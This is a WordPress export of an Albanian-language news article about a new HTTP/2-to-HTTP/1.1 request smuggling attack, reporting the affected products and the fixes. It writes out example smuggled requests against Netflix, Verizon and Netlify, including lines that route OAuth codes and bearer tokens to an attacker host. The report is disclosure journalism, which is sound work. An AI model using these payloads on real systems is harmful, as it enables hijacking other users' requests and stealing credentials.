{"id":100934,"date":"2021-08-07T16:22:34","date_gmt":"2021-08-07T14:22:35","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy"},"modified":"2026-02-09T17:18:09","modified_gmt":"2026-02-09T15:18:09","slug":"novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","status":"publish","type":"post","link":"https:\/\/prohoster.info\/sq\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","title":{"rendered":"Nj\u00eb sulm i ri ndaj sistemeve frontend-backend, i cili lejon nd\u00ebrhyrjen n\u00eb k\u00ebrkesat","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Sistemet web n\u00eb t\u00eb cilat frontend-i pranon lidhje p\u00ebrmes HTTP\/2 dhe i d\u00ebrgon backend-it p\u00ebrmes HTTP\/1.1, jan\u00eb t\u00eb ndjeshme ndaj nj\u00eb varianti t\u00eb ri t\u00eb sulmit 'HTTP Request Smuggling', q\u00eb lejon p\u00ebrmes d\u00ebrgimit t\u00eb k\u00ebrkesave t\u00eb p\u00ebrshtatura t\u00eb klient\u00ebve t\u00eb nd\u00ebrhyjn\u00eb n\u00eb p\u00ebrmbajtjen e k\u00ebrkesave t\u00eb p\u00ebrdoruesve t\u00eb tjer\u00eb, t\u00eb cilat p\u00ebrpunohen n\u00eb t\u00eb nj\u00ebjtin rrjedh mes frontend-it dhe backend-it. Ky sulm mund t\u00eb p\u00ebrdoret p\u00ebr t\u00eb futur kodin e d\u00ebmsh\u00ebm JavaScript n\u00eb nj\u00eb seanc\u00eb me nj\u00eb faqe t\u00eb ligjshme, p\u00ebr t\u00eb anashkaluar sistemet e kufizimeve t\u00eb aksesit dhe p\u00ebr t\u00eb kapur parametrat e autentifikimit.     <\/p>\n<p>Problemi prek web-proksi, balancuesit e ngarkes\u00ebs, web-akselerator\u00ebt, sistemet e shp\u00ebrndarjes s\u00eb p\u00ebrmbajtjes dhe konfigurime t\u00eb tjera n\u00eb t\u00eb cilat k\u00ebrkesat redirektohen sipas skem\u00ebs frontend-backend. Autori i studimit demonstroi mund\u00ebsin\u00eb e sulmit n\u00eb sistemet Netflix, Verizon, Bitbucket, Netlify CDN dhe Atlassian, dhe fitoi 56 mij\u00eb dollar\u00eb n\u00eb programet e shp\u00ebrblimeve p\u00ebr zbardhjen e dob\u00ebsive. Prania e problemit \u00ebsht\u00eb gjithashtu e konfirmuar n\u00eb produktet e F5 Networks. Problemi prek pjes\u00ebrisht mod_proxy n\u00eb serverin http Apache (CVE-2021-33193), rregullimet priten n\u00eb versionin 2.4.49 (zhvilluesit ishin njoftuar p\u00ebr problemin n\u00eb fillim t\u00eb majit dhe kishin 3 muaj p\u00ebr rregullimin). N\u00eb nginx, mund\u00ebsia p\u00ebr t\u00eb treguar nj\u00ebkoh\u00ebsisht titujt 'Content-Length' dhe 'Transfer-Encoding' u bllokua n\u00eb publikimin e kaluar (1.21.1). Mjetet p\u00ebr realizimin e sulmeve tashm\u00eb jan\u00eb shtuar n\u00eb veglat Burp dhe jan\u00eb t\u00eb disponueshme n\u00eb form\u00ebn e nj\u00eb zgjerimi Turbo Intruder.      <\/p>\n<p>Princpi i funksionimit t\u00eb metod\u00ebs s\u00eb re t\u00eb nd\u00ebrhyrjes n\u00eb k\u00ebrkesa n\u00eb trafik \u00ebsht\u00eb i ngjash\u00ebm me dob\u00ebsin\u00eb e zbuluar nga i nj\u00ebjti hulumtues dy vjet m\u00eb par\u00eb, por i kufizuar n\u00eb frontend-et q\u00eb pranojn\u00eb k\u00ebrkesa p\u00ebrmes HTTP\/1.1. T\u00eb kujtojm\u00eb se n\u00eb skem\u00ebn frontend-backend, k\u00ebrkesat e klient\u00ebve priten nga nj\u00eb nyje shtes\u00eb \u2014 frontend-i, i cili vendos nj\u00eb lidhje TCP me jet\u00ebgjat\u00ebsi me backend-in, i cili kryen p\u00ebrpunimin direkt t\u00eb k\u00ebrkesave. P\u00ebrmes k\u00ebsaj lidhjeje t\u00eb zakonshme zakonisht kalohen k\u00ebrkesat e p\u00ebrdoruesve t\u00eb ndrysh\u00ebm, t\u00eb cilat ndjekin nj\u00ebra-tjetr\u00ebn me ndarje p\u00ebrmes mjeteve t\u00eb protokollit HTTP.     <\/p>\n<p>Sulmi klasik \"HTTP Request Smuggling\" bazohet n\u00eb faktin se frontend dhe backend interpretojn\u00eb ndryshe p\u00ebrdorimin e titujve HTTP \"Content-Length\" (p\u00ebrcakton shum\u00ebllojshm\u00ebrin\u00eb totale t\u00eb t\u00eb dh\u00ebnave n\u00eb k\u00ebrkes\u00eb) dhe \"Transfer-Encoding: chunked\" (lejon d\u00ebrgimin e t\u00eb dh\u00ebnave n\u00eb pjes\u00eb). P\u00ebr shembull, n\u00ebse frontend-i mb\u00ebshtet vet\u00ebm \"Content-Length\", por injoron \"Transfer-Encoding: chunked\", at\u00ebher\u00eb sulmuesi mund t\u00eb d\u00ebrgoj\u00eb nj\u00eb k\u00ebrkes\u00eb, n\u00eb t\u00eb cil\u00ebn jan\u00eb p\u00ebrmendura t\u00eb dy titujt \"Content-Length\" dhe \"Transfer-Encoding: chunked\", por madh\u00ebsia n\u00eb \"Content-Length\" nuk p\u00ebrputhet me madh\u00ebsin\u00eb e seqencave chunked. N\u00eb k\u00ebt\u00eb rast, frontend-i do t\u00eb procesoj\u00eb dhe ridrejtoj\u00eb k\u00ebrkes\u00ebn n\u00eb p\u00ebrputhje me \"Content-Length\", nd\u00ebrsa backend-i do t\u00eb pres\u00eb p\u00ebrfundimin e bllokut n\u00eb baz\u00eb t\u00eb \"Transfer-Encoding: chunked\", dhe pjesa e mbetur e k\u00ebrkes\u00ebs nga sulmuesi do t\u00eb ndodhet n\u00eb fillim t\u00eb nj\u00eb k\u00ebrkese tjet\u00ebr p\u00ebr t\u00eb cil\u00ebn \u00ebsht\u00eb d\u00ebrguar pas.         <\/p>\n<p>Ndryshe nga protokolli tekstual HTTP\/1.1, analiza e t\u00eb cilit b\u00ebhet n\u00eb nivelin e rreshtave, HTTP\/2 \u00ebsht\u00eb nj\u00eb protokoll binar dhe manipulot me blloqe t\u00eb dh\u00ebnash me madh\u00ebsi t\u00eb caktuar paraprakisht. N\u00eb t\u00eb nj\u00ebjt\u00ebn koh\u00eb, n\u00eb HTTP\/2 p\u00ebrdoren pseudo-tituj, t\u00eb cil\u00ebt korrespondohen me titujt e zakonsh\u00ebm HTTP. N\u00eb rastin e nd\u00ebrveprimit me backend-in n\u00ebp\u00ebrmjet protokollit HTTP\/1.1, frontend-i i p\u00ebrkthen k\u00ebta pseudo-tituj n\u00eb tituj t\u00eb ngjash\u00ebm HTTP\/1.1. Problemi \u00ebsht\u00eb se backend-i merr vendime p\u00ebr analiz\u00ebn e fluksit n\u00eb baz\u00eb t\u00eb titujve HTTP t\u00eb vendosur nga frontend-i, pa pasur informacion mbi parametrat e k\u00ebrkes\u00ebs origjinale.      <\/p>\n<p>Inclusiv, vlerat \"content-length\" dhe \"transfer-encoding\" mund t\u00eb d\u00ebrgohen n\u00eb form\u00ebn e titujve pseudo, edhe pse n\u00eb HTTP\/2 ato nuk p\u00ebrdoren, pasi madh\u00ebsia e t\u00eb gjitha t\u00eb dh\u00ebnave p\u00ebrcaktohet n\u00eb nj\u00eb fush\u00eb t\u00eb ve\u00e7ant\u00eb. Megjithat\u00eb, gjat\u00eb procesit t\u00eb konvertimit t\u00eb k\u00ebrkes\u00ebs HTTP\/2 n\u00eb HTTP\/1.1, k\u00ebto tituj kalohen dhe mund t\u00eb krijojn\u00eb konfuzion p\u00ebr backend-in. Dallohet dy variante kryesore sulmi: H2.TE dhe H2.CL, n\u00eb t\u00eb cilat backend-i \u00ebsht\u00eb i mashtruar nga nj\u00eb vler\u00eb e pap\u00ebrshtatshme transfer-encoding ose content-length, e cila nuk p\u00ebrputhet me madh\u00ebsin\u00eb reale t\u00eb trupit t\u00eb k\u00ebrkes\u00ebs q\u00eb ka mb\u00ebrritur te frontend-i p\u00ebrmes protokollit HTTP\/2.    <center><img decoding=\"async\" alt=\"Nj\u00eb sulm i ri ndaj sistemeve frontend-backend, i cili lejon nd\u00ebrhyrjen n\u00eb k\u00ebrkesat\" src=\"\/wp-content\/uploads\/2021\/08\/1ea8d97902bf7c4281adce29351c96fc.png\" style=\"display:block;margin: 0 auto;\" \/><\/center>      <\/p>\n<p>Si p\u00ebr shembull i sulmit H2.CL p\u00ebrmendet p\u00ebrcaktimi i madh\u00ebsis\u00eb s\u00eb gabuar n\u00eb pseudo-headerin content-length kur d\u00ebrgohet nj\u00eb k\u00ebrkes\u00eb HTTP\/2 n\u00eb Netflix. Kjo k\u00ebrkes\u00eb \u00e7on n\u00eb shtimin e nj\u00eb headeri t\u00eb ngjash\u00ebm HTTP Content-Length kur i qaset backend-it p\u00ebrmes HTTP\/1.1, por pasi madh\u00ebsia n\u00eb Content-Length \u00ebsht\u00eb e caktuar m\u00eb e vog\u00ebl se e v\u00ebrteta, pjesa e t\u00eb dh\u00ebnave n\u00eb fund trajtohet si fillim i nj\u00eb k\u00ebrkese tjet\u00ebr.     <\/p>\n<p>P\u00ebr shembull, k\u00ebrkesa HTTP\/2 :method\tPOST :path\t\/n :authority\twww.netflix.com content-length\t4 abcdGET \/n HTTP\/1.1 Host: 02.rs?x.netflix.com Foo: bar      <\/p>\n<p>Kjo do t\u00eb \u00e7oj\u00eb n\u00eb d\u00ebrgimin e nj\u00eb k\u00ebrkese backend-it: POST \/n HTTP\/1.1 Host: www.netflix.com Content-Length: 4 abcdGET \/n HTTP\/1.1 Host: 02.rs?x.netflix.com Foo: bar    <\/p>\n<p> Duke qen\u00eb se Content-Length ka vler\u00ebn 4, backend-i do ta perceptoj\u00eb si trup k\u00ebrkese vet\u00ebm \"abcd\", nd\u00ebrsa pjesa tjet\u00ebr \"GET \/n HTTP\/1.1\u2026\" do t\u00eb trajtohet si fillimi i nj\u00eb k\u00ebrkese tjet\u00ebr, e cila i \u00ebsht\u00eb lidhur nj\u00eb p\u00ebrdoruesi tjet\u00ebr. Si rrjedhoj\u00eb, do t\u00eb ndodhin disbalanca n\u00eb rrjedh\u00eb dhe n\u00eb p\u00ebrgjigje p\u00ebr k\u00ebrkes\u00ebn tjet\u00ebr do t\u00eb kthehet rezultati i trajtimit t\u00eb k\u00ebrkes\u00ebs nga i huaji. N\u00eb rastin e Netflix, p\u00ebrmendja e nj\u00eb host-i t\u00eb jasht\u00ebm n\u00eb titullin \"Host:\" n\u00eb k\u00ebrkes\u00ebn e huaj krijoi kthimin p\u00ebr klientin t\u00eb p\u00ebrgjigjen \"Location: https:\/\/02.rs?x.netflix.com\/n\" dhe lejuan d\u00ebrgimin e p\u00ebrmbajtjes s\u00eb rast\u00ebsishme p\u00ebr klientin, p\u00ebrfshir\u00eb ekzekutimin e kodit tuaj JavaScript n\u00eb kontekstin e faqes Netflix.      <\/p>\n<p>Alternativa e dyt\u00eb e sulmit (H2.TE) \u00ebsht\u00eb e lidhur me vendosjen e titullit \"Transfer-Encoding: chunked\". P\u00ebrdorimi i pseudo-titullit transfer-encoding n\u00eb HTTP\/2 \u00ebsht\u00eb i ndaluar nga specifikimi dhe k\u00ebrkesat me t\u00eb duhet t\u00eb interpretohen si t\u00eb pap\u00ebrshtatshme. Megjithat\u00eb, disa implementime t\u00eb front-end nuk e marrin parasysh k\u00ebt\u00eb k\u00ebrkes\u00eb dhe lejojn\u00eb p\u00ebrdorimin e pseudo-titullit transfer-encoding n\u00eb HTTP\/2, i cili konvertohet n\u00eb nj\u00eb titull t\u00eb ngjash\u00ebm HTTP. N\u00eb prpresence t\u00eb titullit \"Transfer-Encoding\", backend mund ta interpretoj\u00eb at\u00eb si m\u00eb prioritar dhe t\u00eb kryej\u00eb analiz\u00ebn e t\u00eb dh\u00ebnave n\u00eb m\u00ebnyr\u00eb \"chunked\" duke p\u00ebrdorur blloqe t\u00eb ndryshme n\u00eb formatin \"{p\u00ebrmas\u00eb}\r\n{blk}\r\n{p\u00ebrmas\u00eb}\r\n{blk}\r\n0\", pavar\u00ebsisht ndarjes fillestare sipas p\u00ebrmas\u00ebs totale.    <\/p>\n<p>Prania e nj\u00eb glli t\u00eb till\u00eb u demonstruar n\u00eb shembullin e kompanis\u00eb Verizon. N\u00eb k\u00ebt\u00eb rast, problemi prekte portalin e autentikimit dhe <a href=\"https:\/\/prohoster.info\/sq\/hosting\/hosting-wordpress\/\"  data-wpil-monitor-id=\"1168\">sistemi i menaxhimit t\u00eb p\u00ebrmbajtjes<\/a>, i cili gjithashtu p\u00ebrdoret n\u00eb site si Huffington Post dhe Engadget. P\u00ebr shembull, k\u00ebrkesa e klientit p\u00ebr HTTP\/2: :method\tPOST :path\t\/identitfy\/XUI :authority\tid.b2b.oath.com transfer-encoding\tchunked 0 GET \/oops HTTP\/1.1 Host: psres.net Content-Length: 10 x=\"    <\/p>\n<p>Shkaktoi d\u00ebrgimin e nj\u00eb k\u00ebrkese HTTP\/1.1 te backend:       POST \/identity\/XUI HTTP\/1.1     Host: id.b2b.oath.com     Content-Length: 66     Transfer-Encoding: chunked       0       GET \/oops HTTP\/1.1     Host: psres.net     Content-Length: 10       x=      <\/p>\n<p>Backend, nga ana e tij, injoroi titullin \"Content-Length\" dhe realizoi ndarjen n\u00eb rrjedh\u00eb n\u00eb baz\u00eb t\u00eb \"Transfer-Encoding: chunked\". N\u00eb praktik\u00eb, sulmi lejojti t\u00eb redirektonte k\u00ebrkesat e p\u00ebrdoruesve n\u00eb faqen e vet dhe gjithashtu t\u00eb kapte k\u00ebrkesat e lidhura me autentikimin OAuth, parametrat e t\u00eb cilave shfaqeshin n\u00eb titullin Referer, si dhe t\u00eb simuloj\u00eb nj\u00eb seanc\u00eb autentikimi dhe t\u00eb niste d\u00ebrgimin e sistemit t\u00eb t\u00eb dh\u00ebnave t\u00eb p\u00ebrdoruesit n\u00eb hostin e sulmuesit. GET \/b2blanding\/show\/oops HTTP\/1.1 Host: psres.net Referer: https:\/\/id.b2b.oath.com\/?...&amp;code=secret GET \/ HTTP\/1.1 Host: psres.net Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik...        <\/p>\n<p>P\u00ebr sulmin ndaj realizimeve HTTP\/2 q\u00eb nuk lejojn\u00eb caktimin e pseudo-titullit transfer-encoding, u propozua nj\u00eb metod\u00eb tjet\u00ebr, e lidhur me vendosjen e titullit \"Transfer-Encoding\" duke e bashk\u00ebngjitur at\u00eb me pseudo-tituj t\u00eb tjer\u00eb me ndarje me karakterin e transferimit t\u00eb linj\u00ebs (n\u00eb rastin e konvertimit n\u00eb HTTP\/1.1 krijohen dy tituj t\u00eb ve\u00e7ant\u00eb HTTP).     <\/p>\n<p>P\u00ebr shembull, problemi i cituar ka qen\u00eb i preksh\u00ebm nga Atlassian Jira dhe Netlify CDN (i p\u00ebrdorur p\u00ebr t\u00eb ofruar faqen fillestare t\u00eb Mozilla n\u00eb Firefox). N\u00eb ve\u00e7anti, k\u00ebrkesa HTTP\/2 :method POST :path \/ :authority start.mozilla.org foo b\r\n transfer-encoding: chunked 0\r\n \r\n GET \/ HTTP\/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r\n x=    <\/p>\n<p>shkaktonte d\u00ebrgimin e backend-it t\u00eb k\u00ebrkes\u00ebs HTTP\/1.1 POST \/ HTTP\/1.1\r\n Host: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: chunked\r\n Content-Length: 71\r\n \r\n 0\r\n \r\n GET \/ HTTP\/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r\n x=      <\/p>\n<p>Nj\u00eb mund\u00ebsi tjet\u00ebr p\u00ebr t\u00eb vendosur titullin \u00abTransfer-Encoding\u00bb ishte lidhja e tij me emrin e nj\u00eb pseudo-titulli tjet\u00ebr ose me rreshtin e metod\u00ebs s\u00eb k\u00ebrkes\u00ebs. P\u00ebr shembull, te Atlassian Jira, emri i pseudo-titulli \u00abfoo: bar\r\ntransfer-encoding\u00bb me vler\u00ebn \u00abchunked\u00bb sillte n\u00eb shtimin e titujve HTTP \u00abfoo: bar\u00bb dhe \u00abtransfer-encoding: chunked\u00bb, nd\u00ebrsa p\u00ebrcaktimi n\u00eb pseudo-titullin \u00ab:method\u00bb vler\u00ebn \u00abGET \/ HTTP\/1.1\r\nTransfer-encoding: chunked\u00bb shnd\u00ebrrohej n\u00eb \u00abGET \/ HTTP\/1.1\r\ntransfer-encoding: chunked\u00bb.     <\/p>\n<p>Hulumtuesi q\u00eb identifikoi problemin gjithashtu propozoi nj\u00eb teknik\u00eb tunelimi t\u00eb k\u00ebrkesave p\u00ebr t\u00eb realizuar sulmin n\u00eb frontendet ku p\u00ebr \u00e7do <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/sq\/lir\/ipv4\/\"   title=\"Adresa IP\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"688\">Adresa IP<\/a> caktohet nj\u00eb lidhje e ve\u00e7ant\u00eb me backend-in dhe trafiku i p\u00ebrdoruesve t\u00eb ndrysh\u00ebm nuk p\u00ebrzihet. Teknikat e propozuara nuk lejojn\u00eb nd\u00ebrhyrjen n\u00eb k\u00ebrkesat e p\u00ebrdoruesve t\u00eb tjer\u00eb, por ofrojn\u00eb mund\u00ebsin\u00eb e d\u00ebrgimit t\u00eb nj\u00eb cache t\u00eb p\u00ebrbashk\u00ebt q\u00eb ndikon n\u00eb p\u00ebrpunimin e k\u00ebrkesave t\u00eb tjera dhe lejojn\u00eb z\u00ebvend\u00ebsimin e titujve t\u00eb brendsh\u00ebm HTTP, q\u00eb p\u00ebrdoren p\u00ebr t\u00eb transferuar informacionin operativ nga frontend-i te backend-i (p\u00ebr shembull, gjat\u00eb autentifikimit n\u00eb an\u00ebn e frontend-it, n\u00eb k\u00ebto tituj mund t\u00eb transferohen t\u00eb dh\u00ebna mbi p\u00ebrdoruesin aktual nga backend-i). Si nj\u00eb shembull t\u00eb aplikimit t\u00eb metod\u00ebs n\u00eb praktik\u00eb, me ndihm\u00ebn e d\u00ebrgimit t\u00eb cache-it arrit\u00ebm t\u00eb merrnim kontrollin mbi faqet n\u00eb sh\u00ebrbimin Bitbucket.<br \/>\n<br \/>Burimi: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=55601\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &#171;HTTP Request Smuggling&#187;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432\u043a\u043b\u0438\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0442\u043e\u043c \u0436\u0435 \u043f\u043e\u0442\u043e\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434\u043e\u043c \u0438 \u0431\u044d\u043a\u0435\u043d\u0434\u043e\u043c. \u0410\u0442\u0430\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e JavaScript-\u043a\u043e\u0434\u0430 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0441 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":100935,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-100934","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/sq\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"sq_AL\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/sq\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-08-07T14:22:35+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-02-09T15:18:09+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Sulmi i ri ndaj sistemeve frontend-backend, q\u00eb lejon nd\u00ebrhyrjen n\u00eb k\u00ebrkesat | ProHoster","description":"Sistem\u00ebt e uebit, n\u00eb t\u00eb cilat frontend-i pranon lidhje p\u00ebrmes HTTP\/2 dhe i d\u00ebrgon backend-it p\u00ebrmes HTTP\/1.1, jan\u00eb b\u00ebr\u00eb t\u00eb ndjesh\u00ebm ndaj nj\u00eb varianti t\u00eb ri t\u00eb sulmit \"HTTP Request Smuggling\", q\u00eb lejon d\u00ebrgimin e k\u00ebrkesave t\u00eb formuara n\u00eb m\u00ebnyr\u00eb speciale.","canonical_url":"https:\/\/prohoster.info\/sq\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"sq_AL","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster","og:description":"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, 